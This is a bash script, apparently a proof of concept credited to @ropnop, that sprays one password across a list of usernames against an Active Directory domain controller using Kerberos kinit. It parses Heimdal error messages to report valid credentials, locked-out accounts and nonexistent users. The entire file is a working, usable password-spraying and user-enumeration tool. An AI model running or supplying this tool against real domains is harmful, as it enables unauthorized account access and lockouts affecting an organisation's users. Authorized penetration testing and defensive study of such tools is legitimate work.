#!/bin/bash
# Title: kinit_user_brute.sh
# Author: @ropnop
# Description: This is a PoC for doing horizontal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
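# Validate the argument count before touching any positional parameter, so a
# short invocation prints usage instead of running with empty values.
if [[ $# -ne 4 ]]; then
  echo "[!] Usage: ./kinit_user_brute.sh <domain> <domain controller> <username list> <password>"
  echo "[!] Example: ./kinit_user_brute.sh contoso.com dc1.contoso.com usernames.txt Password123"
  exit 1
fi

DOMAIN=$1
DOMAINCONTROLLER=$2
WORDLIST=$3
PASSWORD=$4

# Fail early if the username list cannot be read; otherwise the redirect on
# the loop below fails after the temp files have already been created.
if [[ ! -r "$WORDLIST" ]]; then
  echo "[!] Cannot read username list: $WORDLIST"
  exit 1
fi

# Kerberos realm names are conventionally upper-case. awk is used rather than
# ${var^^} because that expansion needs bash 4 and Heimdal hosts often ship 3.2.
DOMAIN=$(printf '%s\n' "$DOMAIN" | awk '{print toupper($0)}')
echo "[+] Kerberos Realm: $DOMAIN"
echo "[+] KDC: $DOMAINCONTROLLER"
echo ""

# Throw-away krb5.conf and credential cache. Both are removed on every exit
# path (including the early 'exit 1' branches below): the cache can hold a
# real TGT after a successful login and must not be left behind in /tmp.
k5config=$(mktemp) || exit 1
k5cache=$(mktemp) || exit 1
cleanup() { rm -f -- "$k5config" "$k5cache"; }
trap cleanup EXIT

cat > "$k5config" <<asdfasdf
[libdefaults]
default_realm = $DOMAIN
[realms]
$DOMAIN = {
kdc = $DOMAINCONTROLLER
admin_server = $DOMAINCONTROLLER
}
asdfasdf

START_TIME=$SECONDS
COUNT=0

# 'IFS= read -r' keeps the line verbatim; the '|| [[ -n ... ]]' clause still
# processes a final line that lacks a trailing newline.
while IFS= read -r USERNAME || [[ -n "$USERNAME" ]]; do
  # Accept "user@domain" entries by keeping only the part before the first '@'.
  USERNAME=${USERNAME%%@*}
  # A blank entry would make kinit fall back to the default principal of the
  # current user, which is never what the list meant.
  [[ -z "$USERNAME" ]] && continue

  # printf rather than echo: a password such as "-n" or "-e" would be eaten by
  # echo as an option. kinit reads the password from stdin (Heimdal syntax).
  RESULT=$(
    printf '%s\n' "$PASSWORD" |
      KRB5_CONFIG="$k5config" KRB5CCNAME="$k5cache" kinit --password-file=STDIN "$USERNAME" 2>&1
  )

  # kinit's stderr text is the only signal available; the substrings below are
  # the Heimdal wordings (MIT clients may differ, see the header comment).
  if [[ $RESULT == *"unable to reach"* ]]; then
    echo "[!] Unable to find KDC for realm. Check domain and DC"
    exit 1
  elif [[ $RESULT == *"Wrong realm"* ]]; then
    echo "[!] Wrong realm. Make sure domain and DC are correct"
    exit 1
  elif [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
    echo "[!] $USERNAME is locked out!"
  elif [[ $RESULT == *"Client"* ]] && [[ $RESULT == *"unknown"* ]]; then
    : # username does not exist
  elif [[ $RESULT == *"Password incorrect"* ]]; then
    : # password incorrect
  elif [[ -z "$RESULT" ]]; then
    # Empty output from kinit means a TGT was issued, i.e. the login worked.
    echo "[+] Valid: $USERNAME@$DOMAIN : $PASSWORD"
  else
    echo "[+] Error trying $USERNAME: $RESULT"
  fi
  COUNT=$((COUNT + 1))
done < "$WORDLIST"

echo ""
echo "Tested \"$PASSWORD\" against $COUNT users in $((SECONDS - START_TIME)) seconds"
echo ""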